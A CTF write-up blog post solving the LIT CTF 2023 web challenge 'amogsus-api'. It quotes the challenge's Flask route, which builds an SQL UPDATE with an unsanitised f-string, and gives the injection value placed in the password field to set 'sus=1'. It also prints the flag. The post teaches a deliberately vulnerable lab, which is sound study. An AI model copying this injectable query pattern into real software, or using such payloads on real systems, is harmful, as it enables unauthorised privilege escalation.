Post

LIT CTF 2023 - amogsus-api

Posted
By Nolliv22 1 min read

Description

Category: Web

I’m working on this new api for the awesome game amogsus You can try it out here: http://litctf.org:31783/

amogsus-api.zip

Resolution

1. Overview

Here are the relevent info after reading the source code (main.py):

  • we can access to the flag with the route /flag but it checks if sus is true;
  • when we create an account, sus=False so we can’t access to the flag.

The goal is to change the value of sus to True.

There is a hint about the attack we should use: Also, I think I might have forgotten to sanatize an input somewhere....

Since data are stored in a SQLite3 database, we know that we need to do a SQL Injection.

After reading carefully the source code, we found the entrypoint for an injection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

@app.route('/account/update', methods=['POST'])
def update():
  with sqlite3.connect('database.db') as con:
    cursor = con.cursor()
    token = request.headers.get('Authorization', type=str)
    token = token.replace('Bearer ', '')
    if token:
      for session in sessions:
        if session['token'] == token:
          data = request.form
          username = data['username']
          password = data['password']
          if (username == '' or password == ''):
            return jsonify({'message': 'Please provide your new username and password as form-data or x-www-form-urlencoded!'})
          # INJECTION ENTRYPOINT
          cursor.execute(f'UPDATE users SET username="{username}", password="{password}" WHERE username="{session["username"]}"')
          con.commit()
          session['username'] = username
          return jsonify({'message': 'Account updated!'})
      return jsonify({'message': 'Invalid token!'})
    else:
      return jsonify({'message': 'Please provide your token!'})

We can set our password to password", sus=1, password="password so the query becomes:

1

UPDATE users SET username="{username}", password="password", sus=1, password="password" WHERE username="{session["username"]}

and we changed sus to true.

2. Exploit

We use Insomnia to send request with the server.

Sign in

Now we can log in:

Log in

And we need to add the token for authentification for next requests:

Token

Now we can update our account and perform SQL injection:

Update

And access to the flag:

Flag

LITCTF{1njeC7_Th3_sUs_Am0ng_U5}.

Writeups, LIT CTF 2023
Web
This post is licensed under CC BY 4.0 by the author.